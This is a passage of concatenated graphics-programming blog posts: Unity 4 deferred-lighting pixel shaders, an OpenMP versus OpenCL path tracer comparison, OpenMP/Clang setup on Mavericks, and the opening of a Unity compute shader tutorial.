<p>Something to note: if your UVs aren’t set up to handle a seamless texture, you’re going to have a bad time. In cases where the actual texturing of the object requires UVs to be defined with discontinuities (so…pretty much all cases), you’re going to need to find another way to look up your noise texture. Since Unity 5 gives us access to 2 additional UV channels, I recommend trying UV3 or UV4, which will leave your UV2 channel available for lightmapping :)</p>
<p>The source for everything here (scripts and shaders) can be found on google drive <a href="https://drive.google.com/folderview?id=0B85AH3b17yxpdnNSbnNkS3RzbVE&usp=sharing">here</a></p>
<p>If you have any questions about anything, spot a mistake, or just want to say hi, send me a message <a href="http://twitter.com/khalladay">on twitter</a>. Finally I’d like to say thanks to everyone who has emailed me corrections to previous posts, or in some cases code to keep things up to date with new versions of things. I’ll be updating those posts with everything that’s been sent in soon.</p>
<p>Happy shading!</p>
Using Pixel Shaders with Deferred Lighting in Unity 42015-01-03T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2015/01/03/Deferred-Pixel-Shaders<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2015) and may not run / be useful for the latest version of unity
</div>
<p><br /></p>
<p>In a previous post (<a href="http://kylehalladay.com/blog/tutorial/2014/04/05/Writing-Shaders-For-Deferred-Lighting-Unity.html">link</a>), I talked about why surface shaders are a great way to write shaders for Unity’s Deferred Lighting rendering path, and they are.</p>
<p>But given the choice, I’d rather write pixel shaders. Surface shaders always felt a little too much like magic for me, and I’ll trade writing more lines of code for more control over what my gpu is doing any day of the week.</p>
<p>For forward rendering, writing pixel shaders is virtually no different from writing shaders for any other engine, however not much information is out there about writing pixel shaders that work with Unity’s deferred lighting system (and more maddeningly, there is no information in Unity’s docs), so this post is going to talk about that.</p>
<div align="center">
<img src="/images/post_images/2015-01-03/output_shader.png" />
<font size="2">The shader we'll build in this article</font>
<br />
<br />
</div>
<p>Note that this article will not cover how to write custom lighting models for deferred lighting, but rather how to write shaders which use whatever lighting calculations are generated by the deferred lighting system.</p>
<p>I’m also on a mac, and the shader compiler for opengl is way less picky than for directX, so if you hit any snags on windows, send me a message on twitter and we’ll get things sorted out.</p>
<h2>The Deferred Lighting Process</h2>
<p>If you’re unfamiliar with what Deferred Lighting is, I recommend checking out my earlier post (<a href="http://kylehalladay.com/blog/tutorial/2014/04/05/Writing-Shaders-For-Deferred-Lighting-Unity.html">link</a>), where I go over the differences between deferred and forward rendering. As a quick refresher, Unity’s Deferred lighting system in a 3 step process:</p>
<p><strong>Step 1</strong>: Initial data buffers are constructed. These buffers consist of a depth buffer (Z-Buffer), and a buffer containing the specular power and normals of the objects visible to the camera (G-Buffer).<br /><br />
<strong>Step 2:</strong> the previously built buffers are combined to compute the lighting for each pixel on the screen.<br /><br />
<strong>Step 3</strong>: all of the objects are drawn again. This time, they are shaded with a combination of the computed lighting from step 2 and their surface properties (texture, colour, lighting function, etc).</p>
<p>When you write surface shaders, you don’t really need to worry about the nuts and bolts of this process, but since we’re using pixel shaders we’re directly responsible for the first and last steps. As such all pixel shaders that work with Deferred Lighting are 2 pass shaders (3 pass if you want to cast shadows).</p>
<h2>Our Setup:</h2>
<p>We’ll start building our shader with an empty pixel shader skeleton:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"Specular-Deferred"</span>
<span class="p">{</span>
<span class="n">Properties</span> <span class="p">{</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_SpecColor</span> <span class="p">(</span><span class="s">"Specular Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">0.5</span><span class="p">,</span><span class="mf">0.5</span><span class="p">,</span><span class="mf">0.5</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="n">_Shininess</span> <span class="p">(</span><span class="s">"Shininess"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.01</span><span class="p">,</span><span class="mi">1</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.078125</span>
<span class="p">}</span>
<span class="n">SubShader</span><span class="p">{</span>
<span class="n">Pass</span><span class="p">{</span>
<span class="p">}</span>
<span class="n">Pass</span><span class="p">{</span>
<span class="p">}</span>
<span class="n">Pass</span><span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Since we want our object to properly cast shadows, we need to write three passes. Note that if you only need your object to receive shadows, you can omit the third pass, since the shadow attenuation will already be factored into the light buffer that Unity builds as during Step 2.</p>
<h2>Pass 1: Getting Data Into the G Buffer</h2>
<p>The first thing we need to do is make sure that the G-Buffer knows about our object’s shape and specularity so that it can properly calculate lighting for the scene. To do this, we need a pass that outputs the normals and specular values for our object.</p>
<p>To start, we need to let Unity know which pass to use to get this information. Just like with forward rendering, we’re going to use the LightMode tag to assign our passes different roles. In this case, we’ll use “PrePassBase.”</p>
<p>A lot of this pass is very straightforward, since for the most part all we’re doing is outputting normals, but since we also want our objects to be shiny, we need to set the alpha of our fragment shader’s output to our object’s shininess, like so:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Pass</span><span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span><span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"PrePassBase"</span><span class="p">}</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span> <span class="n">uniform</span> <span class="kt">float</span> <span class="n">_Shininess</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">vIN</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">vertex</span> <span class="o">:</span> <span class="n">POSITION</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">NORMAL</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="nc">vOUT</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">wNorm</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">vOUT</span> <span class="n">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">wNorm</span> <span class="o">=</span> <span class="n">mul</span><span class="p">((</span><span class="n">float3x3</span><span class="p">)</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">float4</span> <span class="n">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">float3</span> <span class="n">norm</span> <span class="o">=</span> <span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">wNorm</span> <span class="o">*</span> <span class="mf">0.5</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.5</span><span class="p">;</span>
<span class="k">return</span> <span class="n">float4</span><span class="p">(</span><span class="n">norm</span><span class="p">,</span> <span class="n">_Shininess</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span></code></pre></figure>
<p>If you’re a bit confused as to why this pass is necessary, think of Deferred Lighting as though it’s a shader replacement technique. In order to build the GBuffer, the camera renders all the objects in the scene using the PrePassBase pass, and saves this to a render texture. It then uses this data as part of the process of building the lighting buffer.</p>
<p>The line in the fragment function which halves the normal and then adds 0.5 to it just takes each component in the normal and re maps it from the range -1 to +1, to the range 0 to 1 so that it can be stored in a texture.</p>
<h2>Pass 2: Getting Data Out of the Light Buffer</h2>
<p>Once that lighting buffer is created, our job changes from putting data into it, to getting data out of it.</p>
<p>Just like forward rendering, our second pass uses a different tag, PrePassFinal, to let Unity know to use this pass for the last step of the deferred rendering process. Otherwise, the first few lines of this pass are unremarkable.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Pass</span><span class="p">{</span>
<span class="n">Tags</span><span class="p">{</span><span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"PrePassFinal"</span><span class="p">}</span>
<span class="n">ZWrite</span> <span class="n">off</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">uniform</span> <span class="n">float4</span> <span class="n">_SpecColor</span><span class="p">;</span>
<span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_LightBuffer</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">vIN</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">vertex</span> <span class="o">:</span> <span class="n">POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">texcoord</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="nc">vOUT</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uv</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">uvProj</span> <span class="o">:</span> <span class="n">TEXCOORD1</span><span class="p">;</span>
<span class="p">};</span>
<span class="p">}</span></code></pre></figure>
<p>The vert function is where things start getting interesting. The fragment function will sample the Light buffer using tex2Dproj, which takes a 4 component vector and divides the xy components by the w component.</p>
<p>Since what we need to do is sample the light buffer at the exact point on the screen that our fragment will be drawn, we have to set our 4 component uv vector to our fragment’s position in clip space. This will let tex2Dproj perform the perspective divide for us, letting us get at exactly the point on the light buffer that we need.</p>
<p>Or rather, that’s the easy way of looking at it. In truth it’s a bit messier than that. Let’s look at what our vertex function ends up being:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">vOUT</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">float4</span> <span class="n">posHalf</span> <span class="o">=</span> <span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">*</span> <span class="mf">0.5</span><span class="p">;</span>
<span class="n">posHalf</span><span class="p">.</span><span class="n">y</span> <span class="o">*=</span> <span class="n">_ProjectionParams</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">uvProj</span><span class="p">.</span><span class="n">xy</span> <span class="o">=</span> <span class="n">posHalf</span><span class="p">.</span><span class="n">xy</span> <span class="o">+</span> <span class="n">float2</span><span class="p">(</span><span class="n">posHalf</span><span class="p">.</span><span class="n">w</span><span class="p">,</span> <span class="n">posHalf</span><span class="p">.</span><span class="n">w</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uvProj</span><span class="p">.</span><span class="n">zw</span> <span class="o">=</span> <span class="n">o</span><span class="p">.</span><span class="n">pos</span><span class="p">.</span><span class="n">zw</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">;</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>To start with, we’re halving the clip space coordinates for our projected uvs. I’m assuming this is because the light buffer isn’t actually a screen size texture, but since theres no information available about how Unity’s implementation works under the hood, it’s hard to know for sure.</p>
<p>You could try setting up a deferred lighting scene on an ios device and using Xcode’s gpu capture frame to get at that data, but I don’t have any ios devices in my apartment so I’ll leave that to you (send me a message <a href="http://twitter.com/khalladay">on twitter</a> if you actually try this :D ).</p>
<p>The <a href="http://docs.unity3d.com/Manual/SL-BuiltinValues.html">Unity docs</a> have this to say about _ProjectionParams:</p>
<blockquote>
<p>“x is 1.0 (or –1.0 if currently rendering with a flipped projection matrix), y is the camera’s near plane, z is the camera’s far plane and w is 1/FarPlane.”</p>
</blockquote>
<p>So it looks like all that multiplication is doing is making sure that we’re right side up on platforms where rendering to texture flips the image.</p>
<p>I have no idea why we end up adding the halved w component back to our xy components. Again, twitter me if you have any idea.</p>
<p>But now that that’s covered, our fragment function is really straightforward:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">float4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">light</span> <span class="o">=</span> <span class="n">tex2Dproj</span><span class="p">(</span><span class="n">_LightBuffer</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uvProj</span><span class="p">);</span>
<span class="n">float4</span> <span class="n">logLight</span> <span class="o">=</span> <span class="o">-</span><span class="p">(</span><span class="n">log2</span><span class="p">(</span><span class="n">max</span><span class="p">(</span><span class="n">light</span><span class="p">,</span> <span class="n">float4</span><span class="p">(</span><span class="mf">0.001</span><span class="p">,</span><span class="mf">0.001</span><span class="p">,</span><span class="mf">0.001</span><span class="p">,</span><span class="mf">0.001</span><span class="p">))));</span>
<span class="n">float4</span> <span class="n">texCol</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="k">return</span> <span class="nf">float4</span><span class="p">((</span><span class="n">texCol</span><span class="p">.</span><span class="n">xyz</span> <span class="o">*</span> <span class="n">light</span><span class="p">.</span><span class="n">xyz</span><span class="p">)</span> <span class="o">+</span> <span class="n">float3</span><span class="p">(</span><span class="n">_SpecColor</span><span class="p">.</span><span class="n">xyz</span><span class="p">)</span> <span class="o">*</span> <span class="n">light</span><span class="p">.</span><span class="n">w</span><span class="p">,</span> <span class="n">texCol</span><span class="p">.</span><span class="n">w</span><span class="p">);</span>
<span class="err">}</span></code></pre></figure>
<p>Notice how unlike forward rendering, we don’t have to do any per light calculations, because they’ve already been done for us, and had the resulting value stored in the light buffer. All we have to do is read from that buffer and multiply our fragment colour accordingly. Just like in the first pass, specular values are stored on the alpha channel of the light buffer.</p>
<p>The logTex calculation feels to me like an implementation specific detail that we don’t really need to worry about, except to know that we have to do it to get values that make sense from Unity. I haven’t built any deferred lighting systems from scratch, so I’m not sure if this is a standard way of storing data in a light buffer or not.</p>
<p>But nevertheless, you should now have a working pixel shader with deferred lighting. How exciting! Only one pass left to go.</p>
<h2>Pass 3: Casting Shadows</h2>
<p>One of the cooler parts of Deferred Rendering is getting to have point lights cast shadows, but to do that we’ll need another pass.
Luckily, this pass is the same as any other shadow caster pass in Unity. In theory could let a fallback handle this for you, but for the sake of having a fully standalone shader, let’s add it here as well.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Pass</span> <span class="p">{</span>
<span class="n">Name</span> <span class="s">"ShadowCaster"</span>
<span class="n">Tags</span> <span class="p">{</span> <span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"ShadowCaster"</span> <span class="p">}</span>
<span class="n">Fog</span> <span class="p">{</span><span class="n">Mode</span> <span class="n">Off</span><span class="p">}</span>
<span class="n">ZWrite</span> <span class="n">On</span> <span class="n">ZTest</span> <span class="n">LEqual</span> <span class="n">Cull</span> <span class="n">Off</span>
<span class="n">Offset</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span> <span class="cp">#pragma multi_compile_shadowcaster
</span> <span class="cp">#include "UnityCG.cginc"
</span>
<span class="k">struct</span> <span class="nc">v2f</span> <span class="p">{</span>
<span class="n">V2F_SHADOW_CASTER</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">v2f</span> <span class="n">vert</span><span class="p">(</span> <span class="n">appdata_base</span> <span class="n">v</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v2f</span> <span class="n">o</span><span class="p">;</span>
<span class="n">TRANSFER_SHADOW_CASTER</span><span class="p">(</span><span class="n">o</span><span class="p">)</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">float4</span> <span class="n">frag</span><span class="p">(</span> <span class="n">v2f</span> <span class="n">i</span> <span class="p">)</span> <span class="o">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">SHADOW_CASTER_FRAGMENT</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span> </code></pre></figure>
<h2>Conclusion</h2>
<p>If everything has gone according to plan, you should now have a pixel shader that works with deferred lighting and shadows! If you don’t see your object at all, make sure that you’ve actually switched your camera over to the deferred path (I made that mistake when writing this post).</p>
<p>It’s worth noting that all I did to figure this out was to write surface shaders that only used the deferred lighting path, have them compile down to glsl and figure out what was going on from the compiled shaders.</p>
<p>If you want to learn more (like how to add spherical harmonic lights, or use lightmaps), all you need to do in order to do this yourself is add “exclude_path:forward” to your surface pragma, and add an additional pragma below that, like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma surface surf BlinnPhong exclude_path:forward
#pragma only_renderers gles</span></code></pre></figure>
<p>If you’re on desktop, you’ll need to click the “Show All” button in the inspector to get at the gles code, since gles shaders are meant for mobile devices. If you can read ARB or DirectX assembly, you can do that too, but I find glsl much more readable.</p>
<div align="center">
<img src="/images/post_images/2015-01-03/shader_inspector.png" />
<font size="2">notice the "Show All" button</font>
<br />
<br />
</div>
<p>If you have any questions about anything, spot a mistake, or just want to say hi, send me a message <a href="http://twitter.com/khalladay">on twitter</a>. Happy Shading!</p>
OpenMP vs OpenCL - An Unfair Comparison2014-10-25T00:00:00+00:00http://kylehalladay.com/all/blog/2014/10/25/OpenMP vs OpenCL<p>In the wake of my last post, I decided to get started with my path tracing project by building a small proof of concept renderer to get my feet wet both with the path tracing algorithm and with OpenMP. I was pretty happy with the output of the path tracer (shown below), but I wasn’t happy with the speed I was getting. Since this project’s entire goal is to entertain me, having to wait minutes to see how a code change impacts the output image is a major buzzkill.</p>
<div align="center">
<img src="/images/post_images/2014-10-26/caffeine-4096.png" style="max-width:100%;" />
<br />
<br />
<br />
</div>
<p>So I decided to ask (myself) a really stupid question: would this be faster on the GPU?</p>
<p>And because the answer for that was pretty obvious (yes!), I then asked a slightly less stupid question: how much faster?</p>
<p>To answer that, I wrote a second version of the path tracer using OpenCL and ran both of them with the time command. It goes without saying that the code bases were so different that this comparison isn’t exactly fair, but I’ve always wanted to put a graph in a blog post, so here one is!</p>
<div align="center">
<img src="/images/post_images/2014-10-26/clvsmp.png" style="max-width:100%;" />
<br />
<br />
<br />
</div>
<p>It’s hard to see on the graph, but the OpenCL renderer only barely cracked a minute in running time on the 1024 samples per pixel run. OpenMP started at a minute and a half for the 64 samples per pixel case. There are obviously other things that impact which API will be the best for your use case, but iteration speed is pretty important to me, and it’s how I’m deciding which API I’m using for this project. Waiting makes you a waiter.</p>
<p>If you’re interested, the code for both path tracers can be found on github: <a href="https://github.com/khalladay/CaribouPT">OpenMP</a> or <a href="https://github.com/khalladay/CaffeinePT">OpenCL</a>. If you can see anything in the OpenMP source that could be changed to make it 20x faster (which would <em>almost</em> catch up to OpenCL), please let me know! Until then, it looks like I’m abandoning OpenMP for this project.</p>
<p>As always, I’m <a href="http://twitter.com/khalladay">on twitter</a> if you want to say hi :D Happy Coding!</p>
Setting Up OpenMP on Mavericks2014-07-15T00:00:00+00:00http://kylehalladay.com/all/blog/2014/07/15/Setting-Up-OpenMP-Mavericks<div style="background-color:#EEAAAA;">NOTE: This article is from 2014 and will not be updated. It may or may not still be valid
</div>
<p>If you’ve ever worked with me (or talked with me for more than a half hour) it’s not a secret that I’m completely fascinated with ray and path tracers. My last project was building a <a href="https://github.com/khalladay/xRay">relatively simple ray tracer</a>, so I think it’s time to build a path tracer.</p>
<div align="center">
<img src="/images/post_images/2014-07-15/xray_output_monkey.png" style="max-width:100%;" />
<br />
<font size="2">The Blender monkey rendered in my first ray tracer</font>
<br />
<br />
</div>
<p>I’ve tinkered with a few open source path tracers out there, but the one that caught my eye originally was <a href="http://www.kevinbeason.com/smallpt/">SmallPT</a>, which uses OpenMP. OpenMP is an API built by Intel that makes it dead simple to write parallel code. Want to have a for loop distribute itself over multiple cores? That looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma omp parallel for
</span><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">100</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Loop executed on thread %d"</span><span class="p">,</span> <span class="n">omp_get_thread_num</span><span class="p">());</span>
<span class="p">}</span></code></pre></figure>
<p>After working with Boost’s Thread library on the ray tracer, which ended up dictating a lot of the structure of the renderer, OpenMP seems like a great way to let the compiler/runtime handle the implementation of the threading code and let me focus on actually building something cool.</p>
<p>So with that in mind, today’s article is all about how to set up OpenMP on Mavericks and get it working with a Makefile in Xcode 5; it’s a heck of a lot more involved than I originally anticipated. I suppose one caveat of this post is that most of the information here is taken from other places (which I’ve linked to), I’m just collecting it all in one place for the next person who wants to do this.</p>
<h2>Extreme Yak Shaving</h2>
<p>The first step to getting OpenMP up and running on Mavericks is to install a new compiler. No joke. The version of Clang installed on your system doesn’t support OpenMP, and Apple very quietly replaced gcc with a symlink to Clang with XCode 5, so we’re starting this process up a bit of a creek.</p>
<p>There are 2 commonly recommended options at this point. Probably the most logical solution is to simply install GCC 4.9 using Homebrew or Macports (or build it yourself if that turns your crank), but the Homebrew recipe for GCC 4.9 was broken at the time of writing this, and while I was looking for how to grab it from MacPorts I came across <a href="clang-opm.github.io">OpenMP®/Clang</a>.</p>
<p>OpenMP®/Clang, unsurprisingly, is a modified version of Clang which supports OpenMP. Given that I’m already used to using Clang this seemed like a great idea, especially since the website is active, and indicates that the plan is to eventually contribute to the Clang trunk. May as well jump on the bandwagon early.</p>
<h2>Installing OpenMP®/Clang</h2>
<p>This part is tricky, but luckily StackOverflow has our back. If you check out <a href="http://stackoverflow.com/a/21789869">this post</a> you can find a script that user Jason Parham wrote for automating the process of installing / configuring the tools we need (namely OpenMP®/Clang, and the OpenMP® runtime itself). I modified the paths that everything got built to, but otherwise the steps I took mimic that script almost exactly.</p>
<p>One thing to pay attention to is that the script above will bind the new version of clang to the commands “clang2” and “clang2++,” which is great because it means we don’t have to screw with the moderately important command currently bound to “clang.”</p>
<p>Aside from that though, that script should take care of a lot of the heavy lifting needed to get us going.</p>
<h2>Clang2 and XCode</h2>
<p>If you’re happy just using Makefiles by themselves you can actually just stop here and use them to build you projects (remembering to use the -fopenmp flag), but I still wanted to use XCode as a front end for the llvm debugger so my odyssey continued for a bit. If that sounds like something you want too, the rest of this article will outline how to get that working.</p>
<p>Setting up a makefile based project in XCode is (relatively) straightforward:</p>
<ul>
<li>Create a new project like normal, choosing whatever template makes sense.</li>
<li>
<p>Go to your project settings and delete the pre-generated target(s) for your application</p>
</li>
<li>Create a new target of type “External Build System”</li>
<li>Create a makefile for your project and put it somewhere in your project directory</li>
<li>In your Build Tool Configuration page, set the directory to wherever you’ve chosen to store your makefile, and set the arguments to “-f NAME_OF_YOUR_MAKEFILE”</li>
</ul>
<p>If you’ve followed those steps, your Build Tool Configuration page should look something like the following:</p>
<div align="center">
<img src="/images/post_images/2014-07-15/build_tool_settings.png" />
<br />
</div>
<p><br /></p>
<p>Great. Next up is to actually write the makefile. For the most part this is the same as any other makefile, except that you need to specify “clang2” as the compiler, and include the -fopenmp flag when you compile files that include OpenMP. A really simple makefile that does this might look like the following:</p>
<div align="center">
<img src="/images/post_images/2014-07-15/makefile.png" />
<br />
</div>
<p><br /></p>
<p>We’re almost there, but XCode isn’t through with us yet. If you try to build now, you’ll notice that it fails spectacularly and spits out a cryptic error that boils down to not knowing what the heck “clang2” is. This is because for some reason XCode doesn’t read the PATH variables that we set up in that script ealier, so we need to tell it where to find our compiler.</p>
<p>I’m sure theres a better way of doing this, but after a couple of hours of banging my head against a wall, I’ve resigned to launching XCode from the command line like so:</p>
<pre><code>$ source ~/.profile
$ open -a "Xcode"
</code></pre>
<p>This will open XCode with the path variables we need set up properly. If you like Spotlight as much as I do, I recommend wrapping these in an Automator application so you can run these commands from there.</p>
<p>If you build from the XCode that was opened from the command line, you should finally we able to run your program. If you’re looking for a good test, I recommend the example found on <a href="clang-opm.github.io">clang-opm.github.io</a>. If OpenMP is running correctly, you should be able to see the printf statement get executed from multiple threads when that file is run.</p>
<p>Normally this is where I tell you to contact me with any questions, but I fear that I’m as in the dark about this as you are right now, although hopefully that changes over the next few weeks. In any case, you can get a hold of me <a href="http://twitter.com/khalladay">on twitter</a> if you want to say hi. Happy Coding!</p>
Getting Started With Compute Shaders In Unity2014-06-27T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2014/06/27/Compute-Shaders-Are-Nifty<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number
</div>
<p>I love the simplicity of vert/frag shaders; they only do one thing (push verts and colors to the screen), and they do it exceptionally well, but sometimes, that simplicity feels limiting and you find yourself staring at a loop of matrix calculations happening on your CPU trying desperately to figure out how you could store them in a texture…</p>
<p>…Or maybe that’s just me, but regardless, compute shaders solve that problem, and it turns out that they’re dead simple to use, so I’m going to explain the basics of them today. First I’ll go through the example compute shader that unity auto creates for you, and then I’ll finish off with an example of a compute shader working with a structured buffer of data.</p>
<div align="center">
<img src="/images/post_images/2014-06-30/particlesystem.png" />
<br />
<font size="2">Compute shaders can be used to control the positions of particles</font>
<br />
</div>
<p><br /></p>
<h2>What the Heck is a Compute Shader?</h2>
<p>Simply put, a compute shader is a is a program executed on the GPU that doesn’t need to operate on mesh or texture data, works inside the OpenGL or DirectX memory space (unlike OpenCL which has its own memory space), and can output buffers of data or textures and share memory across threads of execution.</p>
<p>Right now Unity only supports DirectX11 compute shaders, but once everyone catches up to OpenGL 4.3, hopefully us mac lovers will get them too :D</p>
<p>This means that this will be my first ever WINDOWS ONLY tutorial. So if you don’t have access to a windows machine, the rest of this probably won’t be helpful.</p>
<h2>What are they good for? (and what do they suck at?)</h2>
<p>Two words: math and parallelization. Any problem which involves applying the same (no conditional branching) set of calculations to every element in a data set is perfect. The larger the set of calculations, the more you’ll reap the rewards of doing things on your GPU.</p>
<p>Conditional branching really kills your performance because GPUs aren’t optimized to do that, but this is no different from writing vertex and fragment shaders so if you have some experience with them this will be old hat.</p>
<p>There’s also the issue of latency. Getting memory from the GPU back to your CPU takes time, and will likely be your bottleneck when working with compute shaders. This can be somewhat mitigated by ensuring that you optimize your kernels to work on the smallest buffers possible but it will never be totally avoided.</p>
<h2>Got it? Good. Let's get started.</h2>
<p>Since we’re working with DirectX, Unity’s compute shaders need to be written in HLSL, but it’s pretty much indistinguishable from the other shader languages so if you can write Cg or GLSL you’ll be fine (this was my first time writing HLSL too).</p>
<p>The first thing you need to do is create a new compute shader. Unity’s project panel already has an option for this, so this step is easy. If you open up that file, you’ll see the following auto generated code (i’ve removed the comments for brevity):</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma kernel CSMain
</span>
<span class="n">RWTexture2D</span><span class="o"><</span><span class="n">float4</span><span class="o">></span> <span class="n">Result</span><span class="p">;</span>
<span class="p">[</span><span class="n">numthreads</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="mi">8</span><span class="p">,</span><span class="mi">1</span><span class="p">)]</span>
<span class="kt">void</span> <span class="nf">CSMain</span> <span class="p">(</span><span class="n">uint3</span> <span class="n">id</span> <span class="o">:</span> <span class="n">SV_DispatchThreadID</span><span class="p">)</span>
<span class="p">{</span>
